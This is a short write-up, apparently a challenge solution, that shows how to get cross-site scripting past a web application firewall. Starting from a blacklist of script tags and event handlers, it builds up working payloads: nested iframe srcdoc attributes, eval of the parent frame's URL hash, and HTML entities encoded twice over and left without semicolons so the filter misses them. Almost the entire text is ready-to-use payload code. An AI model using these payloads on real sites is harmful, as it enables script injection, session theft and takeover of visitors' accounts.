iframe in iframe (waf xss filter bypass)

challenge

blacklist:

<svg>\n<script>\nand all events (e.g. onload, onerror, onclick, etc...)\neval, alert, prompt, confirm, etc...\n

whitelist:

<iframe src="" srcdoc="">

but blocked:

<iframe src="%09javascript">\n<iframe src="data">\n<iframe srcdoc="<script">\n<iframe srcdoc="&lt;script">\netc...\n

ok. i will try to solve...

payload:

<script>eval(location.hash.substring`1`)</script>

first step
i will use two iframes, so i need two `parent` in payload.

<iframe srcdoc='<script>eval(parent.parent.location.hash.substring`1`)</script>'></iframe>

second step

<iframe srcdoc="<iframe srcdoc='<script>eval(parent.parent.location.hash.substring`1`)</script>'></iframe>"></iframe>

magic

change first char in `script` and `eval` to hex code

<iframe srcdoc="<iframe srcdoc='<&#x73;cript>&#x65;val(parent.parent.location.hash.substring`1`)</&#x73;cript>'></iframe>"></iframe>

or dec code

<iframe srcdoc="<iframe srcdoc='<&#115;cript>&#101;val(parent.parent.location.hash.substring`1`)</&#115;cript>'></iframe>"></iframe>

this payload blocked, waf decode `&#` and `&#x`

but... change `&` or `#` or `x` to code

<iframe srcdoc="<iframe srcdoc='<&amp;#x73;cript>&&#x23;x65;val(parent.parent.location.hash.substring`1`)</&#&#x78;73;cript>'></iframe>"></iframe>

Booom!

interesting

if a dec is used and there is no digit after the code, then the semicolon is not required
if a hex is used and there is no digit and [a-f] after the code, then the semicolon is not required
if a entities is used and there is no [a-z] after the code, then the semicolon is not required

without semicolon

<iframe srcdoc="<iframe srcdoc='&#x26lt&amp#115cript>&&#x23x65val(parent.parent.location.hash.substring`1`)</&amp#115cript>'></iframe>"></iframe>

second booom!